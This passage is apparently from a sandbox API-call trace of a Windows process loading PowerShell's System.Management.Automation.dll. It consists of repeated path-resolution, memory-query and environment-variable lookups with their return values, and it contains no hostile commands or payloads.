lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.440] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.440] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.441] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.442] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.448] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dd34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dce4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.471] GetLastError () returned 0xcb [0053.471] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.472] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.472] GetLastError () returned 0xcb [0053.479] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.485] GetLastError () returned 0xcb [0053.486] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.486] GetLastError () returned 0xcb [0053.489] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.489] GetLastError () returned 0xcb [0053.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.491] GetLastError () returned 0xcb [0053.491] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.491] GetLastError () returned 0xcb [0053.492] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, 
dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.492] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.541] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.541] GetLastError () returned 0xcb [0053.573] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.576] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.576] GetLastError () returned 0xcb [0053.837] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x3225d8 [0053.837] GetLastError () returned 0x0 [0053.837] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x322440 [0053.837] GetLastError () returned 0x0 [0053.950] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.962] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0053.964] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c 
[0053.965] VirtualQuery (in: lpAddress=0x14c914, lpBuffer=0x14d914, dwLength=0x1c | out: lpBuffer=0x14d914*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, 
Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.036] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, 
AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.037] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.038] VirtualQuery (in: lpAddress=0x14d260, lpBuffer=0x14e260, dwLength=0x1c | out: lpBuffer=0x14e260*(BaseAddress=0x14d000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.049] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.049] GetLastError () returned 0xcb [0054.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0054.050] GetLastError () returned 0xcb [0054.050] GetFullPathNameW (in: 
lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.050] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.051] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e00c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.051] GetLastError () returned 0xcb [0054.068] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e05c, lpFilePart=0x0 | out: 
